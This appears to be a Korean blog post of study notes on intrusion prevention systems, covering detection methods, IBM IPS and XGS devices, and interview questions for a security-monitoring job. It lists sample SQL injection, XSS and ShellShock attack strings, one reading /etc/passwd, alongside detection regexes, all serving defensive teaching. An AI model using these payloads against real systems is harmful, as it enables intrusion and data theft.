---
layout : post
title : IPS(Intrusion Prevention System)
---

- Signature - SQL Injection 알려진 구문을 탐지 

- Threshold - 임계치 설정, DOS 공격 탐지

- 행위기반 - 보편화되진 않지만 쓰이고 있긴 하다.

  ​	  	  미래에는 딥러닝, AI 탑재해서 쓸 듯

- IPS - 탐지된 패킷을 솔루션장비에서 물고있다가 정탐으로 인식되면 버린다.

  ​	 패킷에 스트링을 검색하여 탐지

  ​	 IDS에 차단하는 기능을 가지고 있는 것

  ​	 IPS는 임계치 방식에 특화되어있지 않다.

<br>

### IBM IPS 장비

*Response Filters*

- Event 기준
- src IP, dst IP 설정
- block, ignore 선택

<br>

*탐지 엔진 순서*

- Firewall
- Response Filter
- User Define Rule
  - String만 등록(한계가 있음)
  - SNORT 엔진 일부 탑재 OpenSignature(이걸 더 많이 사용함)
  - Tuning Parameter(고급설정)

<br>

*XGS*

- IBM 차세대 IPS 장비
- SNORT 엔진 전체 탑재
- 자체 SSL 인증서 등록(암호화/복호화)
- 각각의 네트워크 구성에 따른 다른 정책 적용

<br>

<br>

## 대표적인 웹 공격 구문

- SQL Injection

  ~~~
  ' or 1=1--  
  ") or ("a"="a  
  and 1=(select @@VERSION) 
  and 1=(IS_SRVROLEMEMBER('sysadmin')) 
  OR 'Simple' BETWEEN 'R' AND 'T' 
  and (substring(db_name(),1,1))='a'
  elect * from (select name_const(version(),1),name_const(version(),1))a
  select * from table where 1=1 and ExtractValue(1,concat(0x01,version()))
  select * from table where 1=1 and UpdateXML(1,concat(0x01,version()),1)
  select * from table where (@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)
  ~~~

  > Regex : /(\%27)\|(\')\|(\-\-)\|(\%23)\|(#)/ix
  >
  > Link : <https://www.symantec.com/connect/articles/detection-sql-injection-and-cross-site-scripting-attacks>

  <br>

- XSS

  ~~~
  <script>alert("test");</script> 
  <iframe src=" hxxp://abc.com" width="0" height="0" frameborder="0"></iframe>
  <object width=0 height=0 sytle=display:none; type=text/xscriptlet data=mk:@MSITStore:mhtml:c:\abc.mht! hxxp://abc.com/attack_chm::exploit.html></object>
  ~~~

  > Regex : /((\%3C)\|<)((\%2F)\|\/)\*[a-z0-9\%]+((\%3E)\|>)/ix
  >
  > Link : <https://www.symantec.com/connect/articles/detection-sql-injection-and-cross-site-scripting-attacks>

  <br>

- Bash ShellShock

  ~~~
  User-Agent : () { :;}; echo bashtest>/tmp/test
  User-Agent : () { :; }; echo $(</etc/passwd)
  User-Agent : () { :; }; /bin/eject" hxxp://example.com/
  HTTP_USER_AGENT=() { :; }; /bin/eject
  ~~~

  > Regex : \"((?:\[^\"\]\|\\\")*)\"
  >
  > Link : <https://stackoverflow.com/questions/28115717/regexp-to-parse-apache2-log-handle-shellshock-bash-hack>

<br><br>

### 배치면접 관제 질문

> FW가 뭐에요?
>
> IDS가 뭐에요?
>
> IPS가 뭐하는 거에요?
>
> VPN 써봤어요?
>
> NAT 설정해봤어요?

